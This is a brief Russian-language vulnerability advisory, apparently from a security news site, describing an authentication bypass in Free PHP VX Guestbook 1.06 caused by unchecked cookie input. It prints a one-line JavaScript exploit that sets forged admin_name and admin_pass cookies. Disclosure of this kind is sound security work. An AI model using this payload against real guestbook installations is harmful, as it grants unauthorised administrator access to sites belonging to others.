Программа: Free PHP VX Guestbook 1.06

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных при обработке cookie. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.

Эксплоит:

javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1;
path=/";



Оставить мнение